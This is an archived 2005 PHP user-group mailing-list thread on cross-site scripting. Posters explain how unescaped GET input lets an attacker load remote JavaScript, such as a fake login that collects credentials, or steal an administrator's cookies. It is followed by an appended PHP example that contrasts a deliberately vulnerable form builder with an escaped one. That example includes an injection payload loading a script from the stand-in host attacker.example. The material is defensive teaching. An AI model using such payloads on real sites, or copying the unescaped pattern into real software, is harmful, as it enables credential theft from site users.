NYCPHP Meetup

NYPHP.org

[nycphp-talk] PHP Penetration Discussion

inforequest 1j0lkq002 at sneakemail.com
Sat May 28 11:33:56 EDT 2005


I think Rasmus' example was a cross-site scripting example, not stealing cookies. 

The faulty web page was coded to build a form based on incoming parameters in the GET string.  So Rasmus ADDED encoded stuff to that GET string, with a script from Rasmus' own website somewhere else. When the faulty page parsed the incoming GET it also followed Rasmus' added instructions, which loaded javascript from another webserver somewhere else. 

That other-site script could be a fake login that collects usernames/passwords. Easier than hacking cookies.




-----Original Message-----
From: 
	"Jose Villegas jv_nyphp-at-duikerbok.com |nyphp dev/internal group use|" <...>
Sent: May 28, 2005 11:21 AM
To: NYPHP Talk <talk at lists.nyphp.org>
Subject: Re: [nycphp-talk] PHP Penetration Discussion

The site in question wasn't escaping characters submitted by a user so 
a person could submit html code which manipulated the markup of the 
response page.

One question: Rasmus mentions that he can trick people into sending 
their user names and passwords. I'm assuming he meant he could do this 
with the hack he demonstrated. But if he goes to a website and does 
this, how does he have access to another person's user names and 
passwords? Isn't he only manipulating the response page which only he 
is seeing?

I'm guessing if he submits his "name" which contains html code, the 
name is stored in a database and retrieved by an administrator, 
javascript could be inserted which could grab cookie values (for 
example) from the administrator. Something similar could be done if the 
name is posted to a bulletin board or a similar web application.

Would there be any other vulnerabilities?

jose

On May 28, 2005, at 1:25 AM, Hans Zaunere wrote:
> For those not on the PHP-General list, a good thread has recently been 
> developing where Rasmus showed some interesting examples and 
> discussion of cross-site scripting vulnerabilities.
>
> Follow the thread
> http://marc.theaimsgroup.com/?t=111721168800001&r=1&w=2
>
> And Rasmus' first post:
> http://marc.theaimsgroup.com/?l=php-general&m=111722197717368&w=2
> ...
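An added example, not code from this thread or from Rasmus' post, showing the kind of faulty page discussed above: a form built from a GET parameter, written into the markup as-is, beside the same page with the value escaped. The parameter name, the form action and the attacker host are made up for illustration, and a plain array stands in for $_GET so the script runs from the command line.

```php
<?php
// Added example (not from the list thread): a form builder that echoes a GET
// parameter into markup, beside the escaped version. The "name" parameter,
// the /login action and attacker.example are assumptions for illustration.

// Vulnerable: the value of the "name" parameter is written into the page as-is.
function build_form_vulnerable(array $get): string
{
    $name = $get['name'] ?? '';
    return '<form method="post" action="/login">'
         . '<input type="text" name="name" value="' . $name . '">'
         . '<input type="submit" value="Sign in">'
         . '</form>';
}

// Hardened: every user-supplied value is HTML-escaped for the context it lands
// in. ENT_QUOTES escapes both quote styles, so a value cannot close the
// value="..." attribute it was placed in and start new tags.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function build_form_safe(array $get): string
{
    $name = $get['name'] ?? '';
    return '<form method="post" action="/login">'
         . '<input type="text" name="name" value="' . esc($name) . '">'
         . '<input type="submit" value="Sign in">'
         . '</form>';
}

// Constructed payload in the shape the thread describes: close the attribute
// and the tag, then pull a script from another web server. In a real request
// it travels URL-encoded in the query string and arrives decoded in $_GET.
$payload = '"><script src="http://attacker.example/fake-login.js"></script><input value="';
$get = ['name' => $payload];   // stand-in for $_GET so this runs from the CLI

echo "Vulnerable output:\n", build_form_vulnerable($get), "\n\n";
echo "Escaped output:\n", build_form_safe($get), "\n\n";

// Count injected <script> elements in each version of the page.
$injected = substr_count(build_form_vulnerable($get), '<script');
$escaped  = substr_count(build_form_safe($get), '<script');
printf("script tags injected: vulnerable=%d, escaped=%d\n", $injected, $escaped);
```

Run it with `php example.php`: the vulnerable output contains a live `<script src="http://attacker.example/...">` element that the victim's browser would fetch when the crafted link is opened, while the escaped output shows the same characters as `&quot;&gt;&lt;script ...` inside the attribute value. The same escaping applies to the stored case Jose describes, where the injected value is read back from a database and shown to an administrator: the fix is escaping on output, whatever the input path.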


